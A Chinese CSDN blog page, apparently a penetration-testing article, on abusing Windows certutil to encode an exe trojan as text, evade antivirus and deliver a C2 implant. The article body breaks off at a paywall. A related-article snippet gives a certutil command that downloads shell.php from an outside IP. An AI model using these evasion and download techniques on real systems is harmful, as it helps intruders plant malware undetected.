《安全研究》利用微软自带Certutil命令ByPassAV上传C2

已于 2023-11-05 00:08:34 修改
阅读量245 收藏 1
点赞数
分类专栏: 安全研究 文章标签: 安全
于 2023-11-03 22:03:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45170890/article/details/134211585
版权
本文介绍了攻击者如何利用Windows系统内置的Certutil工具,通过加密exe木马为txt格式,绕过杀软和文件类型限制,再通过文件切割与拼接,最终解密恢复C2木马的详细步骤。这一过程展示了Certutil在恶意活动中可能被滥用的手段。
摘要由CSDN通过智能技术生成

Certutil是什么

Certutil.exe是Windows操作系统中的合法程序,主要用于管理证书相关操作。它提供了转储和显示证书颁发机构(CA)的配置信息、配置证书服务、备份和还原CA组件,以及验证证书、密钥对和证书链等功能,然而,由于其功能强大,很多攻击者滥用Certutil.exe程序将其用于攻击辅助,常用于远程下载,但不知道它还能加密解密本地文件(不会报毒,可以用来ByPassAV)

PS C:\Users\Administrator> Certutil -?

动词:
  -dump             -- 转储配置信息或文件
  -dumpPFX          -- 转储 PFX 结构
  -asn              -- 分析 ASN.1 文件

  -decodehex        -- 解码十六进制编码的文件
  -decode           -- 解码 Base64 编码的文件
  -encode           -- 将文件编码为 Base64

  -deny             -- 拒绝挂起的申请
  -resubmit         -- 重新提交挂起的申请
  -setattributes    -- 为挂起申请设置属性
  -setextension     -- 为挂起申请设置扩展
  -revoke           -- 吊销证书
  -isvalid          -- 显示当前证书部署

  -getconfig        -- 获取默认配置字符串
  -ping             -- Ping Active Directory 证书服务申请接口
  -pingadmin        -- Ping Active Directory 证书服务管理接口
  -CAInfo           -- 显示 CA 信息
  -ca.cert          -- 检索 CA 的证书
  -ca.chain         -- 检索 CA 的证书链
  -GetCRL           -- 获取 CRL
  -CRL              -- 发布新的 CRL [或仅增量 CRL]
  -shutdown         -- 关闭 Active Directory 证书服务

  -installCert      -- 安装证书颁发机构证书
  -renewCert        -- 续订证书颁发机构证书

  -schema           -- 转储证书架构
  -view             -- 转储证书视图
  -db
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
certutil证书管理命令
啊渊的专栏
09-23 5295
certutil是Linux系统中的一个命令行工具,用于管理和操作证书和密钥。它可以用于安全套接字层(SSL/TLS)证书的导入、导出、查看和删除。certutil还可以用于创建新的证书数据库和密钥库。这个工具在Linux系统中广泛用于网络安全和加密操作,提供了方便的命令行接口来处理证书和密钥。
Windows自带渗透工具Certutil介绍(免杀、哈希计算、md5、sha256、下载文件、base64编码)
墨痕诉清风的博客
01-07 6616
目录 Certutil 环境 编码 解码 散列 下载 系统错误代码 使用Certutil进行渗透测试 提交恶意可执行文件 提交恶意 DLL 编码(免杀) 有效载荷可以被编码或加密,以避免被检测(免杀)。 Certutil 是 Windows 操作系统上预装的工具,可用于 校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。 本文仅供学习使用,请勿用于非法操作,后果与作者无关。 下面,将介绍它在 Windows 渗透测试中的作用。 Certutil Certutil
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
内网渗透:九、certutil-远程下载绕过
liu_jia_liang的博客
03-11 2054
内网渗透:九、certutil-远程下载绕过 目录 内网渗透:九、certutil-远程下载绕过 一、CertUti 使用语法 :windows 二、certutil绕过*混淆方式 一、CertUti Certutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。 当 certutil 在没有附加参数的证书颁发机构上运行时...
利用certutil.exe实现在批处理(bat)中嵌入exe文件的方法
09-21
主要介绍了利用certutil.exe实现在批处理(bat)中嵌入exe文件的方法,需要的朋友可以参考下
启动应用程序出现certutil.exe找不到问题解决
最新发布
wbcmbfy的博客
06-06 1544
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个certutil.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现certutil.exe丢失要怎么解决?
certutil命令
09-15
certutil是一个Windows操作系统中的命令行工具,用于执行与证书和密钥相关的操作。它可以用于查看、安装、导出和删除证书,生成证书请求以及执行其他与证书相关的任务。 一些常见的certutil命令包括: 1. certutil...
certutil命令的具体用法
05-12
certutil 是 Windows 操作系统中的一个命令行工具,主要用于证书管理和操作。其具体用法如下: 1. 查看证书:certutil -viewstore [storename] 2. 添加证书:certutil -addstore [storename] [filename] 3. 删除...
Windows命令行通过certutil命令查看文件的MD5-SHA1-SHA256校验值
第七宇林的博客
07-24 1万+
Windows系统中通过 “certutil -hashfile 文件名 hash算法” dos命令可以查看文件的MD5,SHA1,SHA256 哈希校验值,无需第三方工具。并推荐一个在线查看文件的各种哈希校验值: https://www.atool99.com/file_hash.php 。
渗透中Windows利用Certutil进行文件下载
大河之犬的博客
09-26 2705
是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途渗透中主要利用其下载、编码、解码、替代数据流等功能可以在命令行用certutil -?
certutil工具的用法
谢公子的博客
03-23 7545
certutil certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。 远程下载 certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c
Win7系统提示找不到certutil.exe文件的解决办法
file
02-23 1060
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个certutil.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现certutil.exe丢失要怎么解决?
Windows下使用CertUtil命令计算文件的Hash值及做Base64编解码
henter的专栏
04-25 1万+
    Windows 操作系统从 Win7 开始,包含了一个名为 CertUtil命令。可以使用该命令计算指定文件的杂凑值,具体用法如下:CertUtil   -hashfile  文件名(可包含路径)   杂凑算法名    “杂凑算法名”可以取以下值:MD2, MD5, MD5, SHA1, SHA256, SHA384, SHA512。当该参数被省略时,使用 SHA1 算法。    使用...
certutil导入证书
要把所有那些负面的信息当做对自身行为的评价,而不是对自身价值的评判。
06-21 871
【代码】certutil导入证书。
网络安全的行业黑话 ——攻击篇 之攻击方法(2)
城下深蓝的博客
10-03 2013
网络安全的行业黑话 ——攻击篇 之攻击方法(2)
CMD哈希工具certutil -hashfile
qq_14931165的博客
12-22 1129
Windows下无需借助其他工具,仅使用cmd命令即可计算出文件的哈希,支持MD2 MD4 MD5 SHA1 SHA256 SHA384 SHA512多种算法。
渗透测试中常用的文件下载方式总结
qq_32660043的博客
02-24 1001
那些常见的文件下载姿势总结。
win10下使用certutil工具对文件的SHA1、MD5和SHA256哈希结果做验证(超简单,附图)
Little_ant_的博客
10-10 4319
初步介绍       众所周知,当我们从网上下载软件时,发行商为了保证用户在下载过程中自己的软件没有被更改,都会通过一些哈希函数来确保他们软件的完整性。比如:在网上有一些攻击者会在其中植入像插件,广告或病毒等等恶意代码,相信一些朋友有过类似的体验,特别是在从非官方的网站上下载安装软件的时候。       所以用户是有必要对软件的完整性做一个检验的,目前常用的哈希函数是SHA256(因为它更
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值